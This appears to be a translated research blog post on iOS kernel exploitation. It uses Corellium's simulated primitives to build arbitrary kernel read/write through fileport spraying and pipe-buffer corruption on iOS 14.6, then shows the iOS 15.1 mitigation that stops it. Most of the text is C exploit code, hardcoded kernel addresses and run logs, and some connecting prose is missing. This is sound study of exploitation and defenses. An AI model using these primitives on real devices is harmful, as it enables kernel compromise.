在Corellium网站上通过已得到修复的漏洞练习exploit的开发技巧的过程中,我开始思考如何利用Corellium的管理程序的“魔法”特性来练习通用的漏洞利用技术——即使不借助于特定的漏洞。之所以会有这个想法,是因为我受到了Brandon Azad下面这段话的启发:
例如,下面的代码将创建一个管道,它被表示为一对文件描述符(一个是“read end”和一个是“write end”),然后,写入32字节的字符A:
int pipe_pairs[2] = {0}; if (pipe(pipe_pairs)) { fprintf(stderr, "[!] Failed to create pipe: %s\n", strerror(errno)); exit(-1); } printf("Pipe read end fd: %d\n", pipe_pairs[0]); printf("Pipe write end fd: %d\n", pipe_pairs[1]); char pipe_buf_contents[32]; memset(pipe_buf_contents, 0x41, sizeof(pipe_buf_contents)); write(pipe_pairs[1], &pipe_buf_contents, sizeof(pipe_buf_contents)); char buf[33] = {0}; read(pipe_pairs[0], &buf, 32); printf("Read from pipe: %s\n", buf);
/* Simulate a 0x20 byte read from an arbitrary kernel address, representative of a primitive from a bug. * Caller is responsible for freeing the buffer. */ static char *corellium_read(uint64_t kaddr_to_read) { char *leak = calloc(1, 128); unicopy(UNICOPY_DST_USER|UNICOPY_SRC_KERN, (uintptr_t)leak, kaddr_to_read, 0x20); return leak; } /* Simulate a 64-bit arbitrary write */ static void corellium_write64(uintptr_t kaddr, uint64_t val) { uint64_t value = val; unicopy(UNICOPY_DST_KERN|UNICOPY_SRC_USER, kaddr, (uintptr_t)&value, sizeof(value)); }
// Create two pipes int pipe_pairs[4] = {0}; for (int i = 0; i < 4; i += 2) { if (pipe(&pipe_pairs[i])) { fprintf(stderr, "[!] Failed to create pipe: %s\n", strerror(errno)); exit(-1); } } char pipe_buf_contents[64]; memset(pipe_buf_contents, 0x41, sizeof(pipe_buf_contents)); write(pipe_pairs[1], &pipe_buf_contents, sizeof(pipe_buf_contents)); memset(pipe_buf_contents, 0x42, sizeof(pipe_buf_contents)); write(pipe_pairs[3], &pipe_buf_contents, sizeof(pipe_buf_contents));
现在,我们需要在内核内存中定位这些结构。其中,一种方法是使用任意读取来遍历struct proc链表,以查找exploit进程,然后遍历其p_fd->fd_ofiles数组,以查找管道的fileglob,最后读取fileglob->fg_data,这将是一个struct管道。不幸的是,这需要多次读取,并且,我们还要假装read原语是不可靠的。它还需要了解KASLR的slide,以便找到struct proc列表的头部。总而言之,我们需要一种不同的方法。
int pipe_read_fd = [...]; // Assume this was created elsewhere mach_port_t my_fileport = MACH_PORT_NULL; kern_return_t kr = fileport_makeport(pipe_read_fd, &my_fileport);
同时,该struct管道还包含一个嵌入式结构(struct pipebuf),其中保存的是管道缓冲区的地址。通过使用两次任意读取原语,我们就可以确定struct管道的地址。为了达到我们的目的,我们还必须再一次定位管道的地址,所以,我们总共需要使用四次任意读取原语。但是,我们该如何找出相应的内核地址呢?
(lldb) process plugin packet monitor patch 0xFFFFFFF00756F4F8 print_int("Fileport allocated", cpu.x[0]); print("\n");
其中,process plugin packet monitor用于告诉lldb,将原始“monitor”命令发送给远程调试器存根。据这些钩子文档称,这些命令在lldb中“通常是不可用的”,但至少对这个钩子来说似乎是有效的。
int sys_fileport_makeport(proc_t p, struct fileport_makeport_args *uap, __unused int *retval) { int err; int fd = uap->fd; // [1] user_addr_t user_portaddr = uap->portnamep; struct fileproc *fp = FILEPROC_NULL; struct fileglob *fg = NULL; ipc_port_t fileport; mach_port_name_t name = MACH_PORT_NULL; [...] err = fp_lookup(p, fd, &fp, 1); // [2] if (err != 0) { goto out_unlock; } fg = fp->fp_glob; // [3] if (!fg_sendable(fg)) { err = EINVAL; goto out_unlock; } [...] /* Allocate and initialize a port */ fileport = fileport_alloc(fg); // [4] if (fileport == IPC_PORT_NULL) { fg_drop_live(fg); err = EAGAIN; goto out; } [...] }
ipc_port_t fileport_alloc(struct fileglob *fg) { return ipc_kobject_alloc_port((ipc_kobject_t)fg, IKOT_FILEPORT, IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST); }
$ jtool2 --analyze kernel-iPhone9,1-18F72 Analyzing kernelcache.. This is an old-style A10 kernelcache (Darwin Kernel Version 20.5.0: Sat May 8 02:21:50 PDT 2021; root:xnu-7195.122.1~4/RELEASE_ARM64_T8010) Warning: This version of joker supports up to Darwin Version 19 - and reported version is 20 -- Processing __TEXT_EXEC.__text.. Disassembling 6655836 bytes from address 0xfffffff007154000 (offset 0x15001c): __ZN11OSMetaClassC2EPKcPKS_j is 0xfffffff0076902f8 (OSMetaClass) Can't get IOKit Object @0x0 (0xfffffff007690b5c) [...] opened companion file ./kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB Dumping symbol cache to file Symbolicated 7298 symbols and 9657 functions
$ grep ipc_kobject_alloc_port kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB 0xfffffff00719de7c|_ipc_kobject_alloc_port| $ grep fileport_makeport kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB 0xfffffff00756f3a4|_fileport_makeport|
#define KERNEL_BASE 0xFFFFFFF007004000 uint64_t kslide = get_kernel_addr(0) - KERNEL_BASE; printf("Kernel slide: 0x%llx\n", kslide); printf("Place hypervisor hook:\n"); uint64_t patch_address = g_kparams->fileport_allocation_kaddr+kslide; printf("\tprocess plugin packet monitor patch 0x%llx print_int(\"Fileport allocated\", cpu.x[0]); print(\"\\n\");\n", patch_address); printf("Press enter to continue\n"); getchar();
一旦钩子安装到位,我们就可以喷射100k fileport,并选择一个作为我们要猜测的内存地址。我简单地向上滚动了一下,在列表的3/4处随机选择了一个,这对于PoC来说似乎足够好了。一个更严谨的做法,是通过多次运行来跟踪地址范围,并尝试挑选一个已知的高概率的地址,例如如Justin Sherman的IOMobileFrameBuffer漏洞利用代码就采用了这种方式。
struct kpipe { int rfd; int wfd; uint64_t fg_ops; uint64_t r_fg_data; }; static struct kpipe *find_pipe(int rfd, int wfd) { struct kpipe *kp = NULL; char *leak = NULL; char *fileglob = NULL; char *fg_data = NULL; printf("[*] Spraying fileports\n"); mach_port_t fileports[NUM_FILEPORTS] = {0}; for (int i = 0; i < NUM_FILEPORTS; i++) { kern_return_t kr = fileport_makeport(rfd, &fileports[i]); CHECK_KR(kr); } printf("[*] Done spraying fileports\n"); #ifdef SAMPLE_MEMORY // No need to continue, just exit printf("[*] Finished creating memory sample, exiting\n"); exit(0); #endif uint64_t kaddr_to_read = g_kparams->fileport_kaddr_guess; leak = read_kernel_data(kaddr_to_read+g_kparams->kobject_offset); // port->kobject, should point to a struct fileglob if (!leak) { printf("[!] Failed to read kernel data, will likely panic soon\n"); goto out; } uint64_t pipe_fileglob_kaddr = *(uint64_t *)leak; if ((pipe_fileglob_kaddr & 0xff00000000000000) != 0xff00000000000000) { printf("[!] Failed to land the fileport spray\n"); goto out; } pipe_fileglob_kaddr |= 0xffffff8000000000; // Pointer might be PAC'd printf("[*] Found pipe structure: 0x%llx\n", pipe_fileglob_kaddr); // +0x28 points to fg_ops to leak the KASLR slide // +0x38 points to fg_data (struct pipe) fileglob = read_kernel_data(pipe_fileglob_kaddr+0x28); if (!fileglob) { printf("[!] Failed to read kernel data, will likely panic soon\n"); goto out; } kp = calloc(1, sizeof(struct kpipe)); kp->rfd = rfd; kp->wfd = wfd; kp->fg_ops = *(uint64_t *)fileglob; kp->r_fg_data = *(uint64_t *)(fileglob+0x10); printf("[*] pipe fg_ops: 0x%llx\n", kp->fg_ops); printf("[*] pipe r_fg_data: 0x%llx\n", kp->r_fg_data); out: for (int i = 0; i < NUM_FILEPORTS; i++) { kern_return_t kr = mach_port_destroy(mach_task_self(), fileports[i]); CHECK_KR(kr); } #define FREE(m) free(m); m = NULL; FREE(leak); FREE(fileglob); FREE(fg_data); #undef FREE return kp; }
现在,我们已经知道了管道的位置,因此,我们不仅可以写入64位的值,同时,也拥有可靠的任意读/写方法!另外,struct管道还包含了一个嵌入式结构,struct pipebuf,其中含有我们关心的所有字段:
struct pipebuf { u_int cnt; /* number of chars currently in buffer */ u_int in; /* in pointer */ u_int out; /* out pointer */ u_int size; /* size of buffer */ #if KERNEL caddr_t OS_PTRAUTH_SIGNED_PTR("pipe.buffer") buffer; /* kva of buffer */ #else caddr_t buffer; /* kva of buffer */ #endif /* KERNEL */ };
其中,in和out字段可用作指示器,以跟踪针对pipebuf的写和读操作的当前偏移量,而buffer字段则指向包含管道数据的内核内存。下一步非常简单,只需将pipe1的缓冲区地址(相对于struct管道的偏移量为+0x10)设置为pipe2的struct proc的地址即可:
ctx->pipe1 = find_pipe(pipe_pairs[0], pipe_pairs[1]); [...] ctx->pipe2 = find_pipe(pipe_pairs[2], pipe_pairs[3]); [...] // Set pipe1's buffer to point to pipe2's fg_data printf("[*] Setting pipe1->buffer (0x%llx) to pipe2's fg_data (0x%llx)...\n", (ctx->pipe1->r_fg_data+0x10), ctx->pipe2->r_fg_data); kwrite64(ctx->pipe1->r_fg_data+0x10, ctx->pipe2->r_fg_data);
int pipe_kread(uint64_t kaddr, void *buf, size_t len) { assert(g_pipe_rw_ctx); struct pipe_rw_context *ctx = g_pipe_rw_ctx; read(ctx->pipe1->rfd, &ctx->prw, sizeof(ctx->prw)); ctx->prw.cnt = len; ctx->prw.size = len; ctx->prw.buffer = kaddr; ctx->prw.in = 0; ctx->prw.out = 0; write(ctx->pipe1->wfd, &ctx->prw, sizeof(ctx->prw)); return read(ctx->pipe2->rfd, buf, len); }
其中,prw是一个与struct pipebuf的布局相匹配的一个结构体:
struct pipe_rw { u_int cnt; u_int in; u_int out; u_int size; uint64_t buffer; };
int pipe_kwrite(uint64_t kaddr, void *buf, size_t len) { assert(g_pipe_rw_ctx); struct pipe_rw_context *ctx = g_pipe_rw_ctx; read(ctx->pipe1->rfd, &ctx->prw, sizeof(ctx->prw)); if (len < 0x200) { ctx->prw.size = 0x200; // Original value, this works, but what if we write more than 0x200 bytes? } else if (len < 0x4000) { ctx->prw.size = 0x4000; } else { errx(EXIT_FAILURE, "[!] Writes of size >=0x4000 are not supported!\n"); } ctx->prw.cnt = len; ctx->prw.buffer = kaddr; ctx->prw.in = 0; ctx->prw.out = 0; write(ctx->pipe1->wfd, &ctx->prw, sizeof(ctx->prw)); return write(ctx->pipe2->wfd, buf, len); }
// Example of arbitrary read printf("[*] Beginning arbitrary read of kernel version string...\n"); char version[128] = {0}; pipe_kread(g_kparams->version_string_kaddr+g_pipe_rw_ctx->kslide, &version, sizeof(version)); hexdump(version, sizeof(version)); // Example of arbitrary write printf("[*] Beginning arbitrary write of kern.maxfilesperproc...\n"); pipe_kwrite32(g_kparams->maxfilesperproc_kaddr+g_pipe_rw_ctx->kslide, 0x41414141); int maxfilesperproc = 0; size_t sysctl_size = sizeof(int); if (sysctlbyname("kern.maxfilesperproc", &maxfilesperproc, &sysctl_size, NULL, 0)) { errx(EXIT_FAILURE, "sysctlbyname: %s\n", strerror(errno)); } printf("[*] kern.maxfilesperproc: %d (0x%x)\n", maxfilesperproc, maxfilesperproc);
sh-5.0# /tmp/pipe_rw [*] Detected iPhone9,1/18F72 (14.6) [*] Spraying fileports [*] Done spraying fileports [*] Found pipe structure: 0xffffffe19bcc3540 [*] pipe fg_ops: 0xfffffff00acd9640 [*] pipe r_fg_data: 0xffffffe19bc3c9e8 [*] KASLR slide: 0x3bac000 [*] Spraying fileports [*] Done spraying fileports [*] Found pipe structure: 0xffffffe19d0eb7e0 [*] pipe fg_ops: 0xfffffff00acd9640 [*] pipe r_fg_data: 0xffffffe19bc3cb50 [*] Setting pipe1->buffer (0xffffffe19bc3c9f8) to pipe2's fg_data (0xffffffe19bc3cb50)... [*] Beginning arbitrary read of kernel version string... 0x000000: 44 61 72 77 69 6e 20 4b 65 72 6e 65 6c 20 56 65 Darwin Kernel Ve 0x000010: 72 73 69 6f 6e 20 32 30 2e 35 2e 30 3a 20 53 61 rsion 20.5.0: Sa 0x000020: 74 20 4d 61 79 20 20 38 20 30 32 3a 32 31 3a 35 t May 8 02:21:5 0x000030: 30 20 50 44 54 20 32 30 32 31 3b 20 72 6f 6f 74 0 PDT 2021; root 0x000040: 3a 78 6e 75 2d 37 31 39 35 2e 31 32 32 2e 31 7e :xnu-7195.122.1~ 0x000050: 34 2f 52 45 4c 45 41 53 45 5f 41 52 4d 36 34 5f 4/RELEASE_ARM64_ 0x000060: 54 38 30 31 30 00 00 00 00 14 00 00 00 05 00 00 T8010........... 0x000070: 00 00 00 00 00 80 00 00 00 00 00 00 00 30 00 72 .............0.r [*] Beginning arbitrary write of kern.maxfilesperproc... [*] kern.maxfilesperproc: 1094795585 (0x41414141) Done, entering infinite loop, will panic on termination
针对iOS 15.1系统的测试
我们希望这项技术能够推广到iOS的新版本上,所以,下一步是用iOS 15.1创建一个虚拟的iPhone7,并找到不同的部分。当然,像管道上的fg_ops字段和内核版本字符串这样的静态内核地址是不同的,而且要猜测的喷射内核地址也可能会改变。在完成kernelcache检查和fileport喷射采样的这两个相同步骤后,后面将测试两组参数,首先是来自iOS 14.6的参数,然后是来自15.1的参数(都在iPhone 7上完成测试):
static struct kernel_params iPhone7_18F72 = { .kobject_offset = 0x68, .pipe_ops_kaddr = 0xfffffff00712d640, .version_string_kaddr = 0xFFFFFFF00703BB17, .maxfilesperproc_kaddr = 0xfffffff0077d07f0, .fileport_kaddr_guess = 0xffffffe19debc540, .fileport_allocation_kaddr = 0xFFFFFFF00756F4F8, }; static struct kernel_params iPhone7_19B74 = { .kobject_offset = 0x58, .pipe_ops_kaddr = 0xFFFFFFF007143AC8, .version_string_kaddr = 0xFFFFFFF00703BCBE, .maxfilesperproc_kaddr = 0xFFFFFFF007834AE8, .fileport_kaddr_guess = 0xffffffe0f7678820, .fileport_allocation_kaddr = 0xFFFFFFF0075A8EF4, };
sh-5.0# /tmp/pipe_rw [*] Detected iPhone9,1/19B74 (15.1) [*] Spraying fileports [*] Done spraying fileports [*] Found pipe structure: 0xffffffe0f6b7c600 [*] pipe fg_ops: 0xfffffff01a677ac8 [*] pipe r_fg_data: 0xffffffe0f46b09e8 [*] KASLR slide: 0x13534000 [*] Spraying fileports [*] Done spraying fileports [*] Found pipe structure: 0xffffffe0f6b7c720 [*] pipe fg_ops: 0xfffffff01a677ac8 [*] pipe r_fg_data: 0xffffffe0f46b0b50 [*] Setting pipe1->buffer (0xffffffe0f46b09f8) to pipe2's fg_data (0xffffffe0f46b0b50)... [*] Beginning arbitrary read of kernel version string... [...] panic(cpu 0 caller 0xfffffff01ad357c4): kalloc_data_require failed: address 0xffffffe0f46b0b50 in [pipe zone] @kalloc.c:1776 [...]
void __fastcall kalloc_data_require(unsigned __int64 kaddr, unsigned __int64 size) { __int64 zone_index; // x8 unsigned __int16 *v3; // x8 if ( kaddr + size || (zone_index = *(_WORD *)(16LL * (unsigned int)(kaddr >> 14)) & 0x7FF, (zone_security_array[zone_index] & 6) != 4) || ((_DWORD)zone_index != 3 ? (v3 = (unsigned __int16 *)&qword_FFFFFFF0078510A8[21 * zone_index + 6] + 3) : (v3 = (unsigned __int16 *)&unk_FFFFFFF0070FE812), *v3 < size) ) { kalloc_data_require_panic(kaddr, size); } } void __fastcall __noreturn kalloc_data_require_panic(unsigned __int64 kaddr, __int64 size) { __int64 zone_index; // x8 const char *v3; // x9 const char *v4; // x10 unsigned __int16 *zone_allocation_size; // x8 if ( kaddr + size ) panic( "kalloc_data_require failed: address %p not in zone native map @%s:%d", (const void *)kaddr, "kalloc.c", 1785LL); zone_index = *(_WORD *)(16LL * (unsigned int)(kaddr >> 14)) & 0x7FF; if ( (unsigned int)zone_index < 0x28A ) { v3 = (const char *)*((_QWORD *)&off_FFFFFFF0070FAD38 + (((unsigned __int64)(unsigned __int8)zone_security_array[zone_index] >> 1) & 3)); v4 = (const char *)qword_FFFFFFF0078510A8[21 * zone_index + 2]; if ( (zone_security_array[zone_index] & 6) == 4 ) { if ( (_DWORD)zone_index == 3 ) zone_allocation_size = (unsigned __int16 *)&unk_FFFFFFF0070FE812; else zone_allocation_size = (unsigned __int16 *)&qword_FFFFFFF0078510A8[21 * zone_index + 6] + 3; panic( "kalloc_data_require failed: address %p in [%s%s], size too large %zd > %zd @%s:%d", (const void *)kaddr, v3, v4, size, *zone_allocation_size, "kalloc.c", 1782LL); } panic("kalloc_data_require failed: address %p in [%s%s] @%s:%d", (const void *)kaddr, v3, v4, "kalloc.c", 1776LL); } panic_zone_is_outside_zone_array(&qword_FFFFFFF0078510A8[21 * zone_index]); }
static int pipespace(struct pipe *cpipe, int size) { vm_offset_t buffer; if (size <= 0) { return EINVAL; } if ((buffer = (vm_offset_t)kalloc(size)) == 0) { return ENOMEM; } /* free old resources if we're resizing */ pipe_free_kmem(cpipe); cpipe->pipe_buffer.buffer = (caddr_t)buffer; cpipe->pipe_buffer.size = size; cpipe->pipe_buffer.in = 0; cpipe->pipe_buffer.out = 0; cpipe->pipe_buffer.cnt = 0; OSAddAtomic(1, &amountpipes); OSAddAtomic(cpipe->pipe_buffer.size, &amountpipekva); return 0; }
这将导致在一个kalloc区域中分配内存,大小为从初始写入的大小的四舍五入。在iOS 14.x中,这变成了从KHEAP_DATA_BUFFERS区域中进行分配内存:
static int pipespace(struct pipe *cpipe, int size) { [...] buffer = (vm_offset_t)kheap_alloc(KHEAP_DATA_BUFFERS, size, Z_WAITOK); if (!buffer) { return ENOMEM; } [...] }
这个新的小型缓解措施是一个有趣的发现,它表明了苹果的安全策略:针对各种攻击技术进行安全加固,并以此作为一种深度防御的形式。通过考察Brandon Azad对公开的iOS内核漏洞利用代码的出色调查,我们发现,许多攻击者将管道缓冲区用作“replacer”对象,在释放后使用的情况下,或放在另一种类型的对象之后,作为溢出的目标对象。由于这些都涉及到保持管道缓冲区的指针不变(即指向合法的管道缓冲区内存空间),所以,这种缓解技术并不会影响这些攻击技术。也许苹果公司已经看到这种技术在野外使用,或者他们只是把它当作一种显而易见的攻击技术,所以,他们决定预先采取相应的防御措施。